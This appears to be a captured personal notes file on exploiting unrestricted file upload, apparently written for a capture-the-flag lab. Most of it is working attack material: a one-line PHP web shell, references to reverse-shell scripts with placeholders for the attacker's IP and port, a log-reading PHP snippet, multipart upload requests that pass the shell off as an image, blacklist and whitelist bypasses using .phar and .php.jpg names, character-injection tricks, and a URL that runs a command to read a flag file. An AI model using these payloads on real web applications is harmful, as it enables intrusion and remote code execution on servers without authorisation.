[38;5;238m───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[0m
       [38;5;238m│ [0mFile: [1mnotes.txt[0m
[38;5;238m───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[0m
[38;5;238m   1[0m   [38;5;238m│[0m [38;2;248;248;242mThe worst possible kind of file upload vulnerability is an unauthenticated arbitrary file upload vulnerability.[0m
[38;5;238m   2[0m   [38;5;238m│[0m [38;2;248;248;242m  - With this type of vulnerability, a web application allows any unauthenticated user to upload any file type,        making it one step away from allowing any user to execute code on the back-end server.[0m
[38;5;238m   3[0m   [38;5;238m│[0m 
[38;5;238m   4[0m   [38;5;238m│[0m 
[38;5;238m   5[0m   [38;5;238m│[0m 
[38;5;238m   6[0m   [38;5;238m│[0m [38;2;248;248;242mThe most common and critical attack caused by arbitrary file uploads is gaining remote command execution over the back-end server by uploading a web shell or uploading a script that sends a reverse shell.[0m
[38;5;238m   7[0m   [38;5;238m│[0m 
[38;5;238m   8[0m   [38;5;238m│[0m 
[38;5;238m   9[0m   [38;5;238m│[0m [38;2;248;248;242mThere are various attacks we may be able to perform to exploit the file upload functionality if certain security protections were missing from the web application.[0m
[38;5;238m  10[0m   [38;5;238m│[0m 
[38;5;238m  11[0m   [38;5;238m│[0m [38;2;248;248;242mExamples of these attacks include:[0m
[38;5;238m  12[0m   [38;5;238m│[0m [38;2;248;248;242m- Introducing other vulnerabilities like XSS or XXE.[0m
[38;5;238m  13[0m   [38;5;238m│[0m [38;2;248;248;242m- Causing a Denial of Service (DoS) on the back-end server.[0m
[38;5;238m  14[0m   [38;5;238m│[0m [38;2;248;248;242m- Overwriting critical system files and configurations.[0m
[38;5;238m  15[0m   [38;5;238m│[0m [38;2;248;248;242m- And many others.[0m
[38;5;238m  16[0m   [38;5;238m│[0m [38;2;248;248;242m==========================================================================[0m
[38;5;238m  17[0m   [38;5;238m│[0m [38;2;248;248;242m||Web Shells||[0m
[38;5;238m  18[0m   [38;5;238m│[0m [38;2;248;248;242m==============[0m
[38;5;238m  19[0m   [38;5;238m│[0m [38;2;248;248;242m________________________________________[0m
[38;5;238m  20[0m   [38;5;238m│[0m [38;2;248;248;242m|shell.php                             |[0m
[38;5;238m  21[0m   [38;5;238m│[0m [38;2;248;248;242m|<?php system($_REQUEST['cmd']); ?>    |[0m
[38;5;238m  22[0m   [38;5;238m│[0m [38;2;248;248;242m---------------------------------------[0m
[38;5;238m  23[0m   [38;5;238m│[0m 
[38;5;238m  24[0m   [38;5;238m│[0m 
[38;5;238m  25[0m   [38;5;238m│[0m [38;2;248;248;242mhttps://github.com/Arrexel/phpbash[0m
[38;5;238m  26[0m   [38;5;238m│[0m [38;2;248;248;242m__________________________________________[0m
[38;5;238m  27[0m   [38;5;238m│[0m [38;2;248;248;242mhttps://github.com/pentestmonkey/php-reverse-shell[0m
[38;5;238m  28[0m   [38;5;238m│[0m [38;2;248;248;242m$ip = 'OUR_IP';     // CHANGE THIS[0m
[38;5;238m  29[0m   [38;5;238m│[0m [38;2;248;248;242m$port = OUR_PORT;   // CHANGE THIS[0m
[38;5;238m  30[0m   [38;5;238m│[0m [38;2;248;248;242m_______________________________________[0m
[38;5;238m  31[0m   [38;5;238m│[0m 
[38;5;238m  32[0m   [38;5;238m│[0m 
[38;5;238m  33[0m   [38;5;238m│[0m 
[38;5;238m  34[0m   [38;5;238m│[0m 
[38;5;238m  35[0m   [38;5;238m│[0m 
[38;5;238m  36[0m   [38;5;238m│[0m 
[38;5;238m  37[0m   [38;5;238m│[0m 
[38;5;238m  38[0m   [38;5;238m│[0m 
[38;5;238m  39[0m   [38;5;238m│[0m 
[38;5;238m  40[0m   [38;5;238m│[0m 
[38;5;238m  41[0m   [38;5;238m│[0m 
[38;5;238m  42[0m   [38;5;238m│[0m 
[38;5;238m  43[0m   [38;5;238m│[0m 
[38;5;238m  44[0m   [38;5;238m│[0m [38;2;248;248;242m ===============================================================================================================[0m
[38;5;238m  45[0m   [38;5;238m│[0m 
[38;5;238m  46[0m   [38;5;238m│[0m [38;2;248;248;242m<?php[0m
[38;5;238m  47[0m   [38;5;238m│[0m [38;2;248;248;242m$output = shell_exec('cat /var/log/mail.log 2>&1');[0m
[38;5;238m  48[0m   [38;5;238m│[0m [38;2;248;248;242mecho "<pre>$output</pre>";[0m
[38;5;238m  49[0m   [38;5;238m│[0m [38;2;248;248;242m?>[0m
[38;5;238m  50[0m   [38;5;238m│[0m 
[38;5;238m  51[0m   [38;5;238m│[0m [38;2;248;248;242m========================================[0m
[38;5;238m  52[0m   [38;5;238m│[0m [38;2;248;248;242mMODIFY REQUEST AND ENTER THE PATH TO GET RCE[0m
[38;5;238m  53[0m   [38;5;238m│[0m 
[38;5;238m  54[0m   [38;5;238m│[0m [38;2;248;248;242m------WebKitFormBoundarysHRiGAm1hwXaMFXM[0m
[38;5;238m  55[0m   [38;5;238m│[0m [38;2;248;248;242mContent-Disposition: form-data; name="uploadFile"; filename="shell.php"[0m
[38;5;238m  56[0m   [38;5;238m│[0m [38;2;248;248;242mContent-Type: image/png[0m
[38;5;238m  57[0m   [38;5;238m│[0m [38;2;248;248;242m<?php system($_REQUEST['cmd']); ?>  [0m
[38;5;238m  58[0m   [38;5;238m│[0m [38;2;248;248;242m------WebKitFormBoundarysHRiGAm1hwXaMFXM--[0m
[38;5;238m  59[0m   [38;5;238m│[0m 
[38;5;238m  60[0m   [38;5;238m│[0m 
[38;5;238m  61[0m   [38;5;238m│[0m [38;2;248;248;242m---> /profile_images/shell.php[0m
[38;5;238m  62[0m   [38;5;238m│[0m [38;2;248;248;242m---> http://138.68.163.76:30363/profile_images/shell.php?cmd=more%20/flag.txt[0m
[38;5;238m  63[0m   [38;5;238m│[0m [38;2;248;248;242m---> http://SERVER_IP:PORT/profile_images/shell.php?cmd=id[0m
[38;5;238m  64[0m   [38;5;238m│[0m 
[38;5;238m  65[0m   [38;5;238m│[0m [38;2;248;248;242m========================================[0m
[38;5;238m  66[0m   [38;5;238m│[0m [38;2;248;248;242mBLACLISTED BYPASSING[0m
[38;5;238m  67[0m   [38;5;238m│[0m [38;2;248;248;242m------WebKitFormBoundary36AnCUiyztBbqs8P[0m
[38;5;238m  68[0m   [38;5;238m│[0m [38;2;248;248;242mContent-Disposition: form-data; name="uploadFile"; filename="shell.phar"[0m
[38;5;238m  69[0m   [38;5;238m│[0m [38;2;248;248;242mContent-Type: image/png[0m
[38;5;238m  70[0m   [38;5;238m│[0m [38;2;248;248;242m<?php system($_REQUEST['cmd']); ?>[0m
[38;5;238m  71[0m   [38;5;238m│[0m [38;2;248;248;242m------WebKitFormBoundary36AnCUiyztBbqs8P--[0m
[38;5;238m  72[0m   [38;5;238m│[0m 
[38;5;238m  73[0m   [38;5;238m│[0m [38;2;248;248;242m======================================[0m
[38;5;238m  74[0m   [38;5;238m│[0m [38;2;248;248;242mWHITELISTED BYPASSING[0m
[38;5;238m  75[0m   [38;5;238m│[0m 
[38;5;238m  76[0m   [38;5;238m│[0m [38;2;248;248;242m ========================================[0m
[38;5;238m  77[0m   [38;5;238m│[0m [38;2;248;248;242m BLACLISTED BYPASSING[0m
[38;5;238m  78[0m   [38;5;238m│[0m [38;2;248;248;242m ------WebKitFormBoundary36AnCUiyztBbqs8P[0m
[38;5;238m  79[0m   [38;5;238m│[0m [38;2;248;248;242m Content-Disposition: form-data; name="uploadFile"; filename="shell.php.jpg"[0m
[38;5;238m  80[0m   [38;5;238m│[0m [38;2;248;248;242m Content-Type: image/png[0m
[38;5;238m  81[0m   [38;5;238m│[0m [38;2;248;248;242m <?php system($_REQUEST['cmd']); ?>[0m
[38;5;238m  82[0m   [38;5;238m│[0m [38;2;248;248;242m ------WebKitFormBoundary36AnCUiyztBbqs8P--[0m
[38;5;238m  83[0m   [38;5;238m│[0m [38;2;248;248;242m ======================================[0m
[38;5;238m  84[0m   [38;5;238m│[0m [38;2;248;248;242mCHARACTER INJECTION[0m
[38;5;238m  85[0m   [38;5;238m│[0m 
[38;5;238m  86[0m   [38;5;238m│[0m [38;2;248;248;242m%20[0m
[38;5;238m  87[0m   [38;5;238m│[0m [38;2;248;248;242m%0a[0m
[38;5;238m  88[0m   [38;5;238m│[0m [38;2;248;248;242m%00[0m
[38;5;238m  89[0m   [38;5;238m│[0m [38;2;248;248;242m%0d0a[0m
[38;5;238m  90[0m   [38;5;238m│[0m [38;2;248;248;242m/[0m
[38;5;238m  91[0m   [38;5;238m│[0m [38;2;248;248;242m.\[0m
[38;5;238m  92[0m   [38;5;238m│[0m [38;2;248;248;242m.[0m
[38;5;238m  93[0m   [38;5;238m│[0m [38;2;248;248;242m…[0m
[38;5;238m  94[0m   [38;5;238m│[0m [38;2;248;248;242m:[0m
[38;5;238m  95[0m   [38;5;238m│[0m 
[38;5;238m  96[0m   [38;5;238m│[0m 
[38;5;238m  97[0m   [38;5;238m│[0m 
[38;5;238m  98[0m   [38;5;238m│[0m 
[38;5;238m  99[0m   [38;5;238m│[0m 
[38;5;238m 100[0m   [38;5;238m│[0m 
[38;5;238m 101[0m   [38;5;238m│[0m 
[38;5;238m 102[0m   [38;5;238m│[0m 
[38;5;238m 103[0m   [38;5;238m│[0m 
[38;5;238m 104[0m   [38;5;238m│[0m 
[38;5;238m 105[0m   [38;5;238m│[0m 
[38;5;238m 106[0m   [38;5;238m│[0m 
[38;5;238m 107[0m   [38;5;238m│[0m 
[38;5;238m 108[0m   [38;5;238m│[0m 
[38;5;238m 109[0m   [38;5;238m│[0m 
[38;5;238m 110[0m   [38;5;238m│[0m 
[38;5;238m 111[0m   [38;5;238m│[0m 
[38;5;238m 112[0m   [38;5;238m│[0m 
[38;5;238m 113[0m   [38;5;238m│[0m 
[38;5;238m 114[0m   [38;5;238m│[0m 
[38;5;238m 115[0m   [38;5;238m│[0m 
[38;5;238m 116[0m   [38;5;238m│[0m 
[38;5;238m 117[0m   [38;5;238m│[0m 
[38;5;238m 118[0m   [38;5;238m│[0m 
[38;5;238m 119[0m   [38;5;238m│[0m 
[38;5;238m 120[0m   [38;5;238m│[0m 
[38;5;238m 121[0m   [38;5;238m│[0m 
[38;5;238m 122[0m   [38;5;238m│[0m 
[38;5;238m 123[0m   [38;5;238m│[0m 
[38;5;238m 124[0m   [38;5;238m│[0m 
[38;5;238m 125[0m   [38;5;238m│[0m 
[38;5;238m 126[0m   [38;5;238m│[0m 
[38;5;238m 127[0m   [38;5;238m│[0m 
[38;5;238m 128[0m   [38;5;238m│[0m 
[38;5;238m 129[0m   [38;5;238m│[0m 
[38;5;238m 130[0m   [38;5;238m│[0m 
[38;5;238m 131[0m   [38;5;238m│[0m 
[38;5;238m 132[0m   [38;5;238m│[0m 
[38;5;238m 133[0m   [38;5;238m│[0m 
[38;5;238m 134[0m   [38;5;238m│[0m 
[38;5;238m 135[0m   [38;5;238m│[0m 
[38;5;238m 136[0m   [38;5;238m│[0m 
[38;5;238m 137[0m   [38;5;238m│[0m 
[38;5;238m 138[0m   [38;5;238m│[0m 
[38;5;238m 139[0m   [38;5;238m│[0m 
[38;5;238m 140[0m   [38;5;238m│[0m 
[38;5;238m 141[0m   [38;5;238m│[0m 
[38;5;238m 142[0m   [38;5;238m│[0m 
[38;5;238m 143[0m   [38;5;238m│[0m 
[38;5;238m 144[0m   [38;5;238m│[0m 
[38;5;238m 145[0m   [38;5;238m│[0m 
[38;5;238m 146[0m   [38;5;238m│[0m 
[38;5;238m 147[0m   [38;5;238m│[0m 
[38;5;238m 148[0m   [38;5;238m│[0m 
[38;5;238m 149[0m   [38;5;238m│[0m 
[38;5;238m 150[0m   [38;5;238m│[0m 
[38;5;238m 151[0m   [38;5;238m│[0m 
[38;5;238m 152[0m   [38;5;238m│[0m 
[38;5;238m 153[0m   [38;5;238m│[0m 
[38;5;238m 154[0m   [38;5;238m│[0m 
[38;5;238m 155[0m   [38;5;238m│[0m 
[38;5;238m 156[0m   [38;5;238m│[0m 
[38;5;238m 157[0m   [38;5;238m│[0m 
[38;5;238m 158[0m   [38;5;238m│[0m 
[38;5;238m 159[0m   [38;5;238m│[0m 
[38;5;238m 160[0m   [38;5;238m│[0m 
[38;5;238m───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[0m
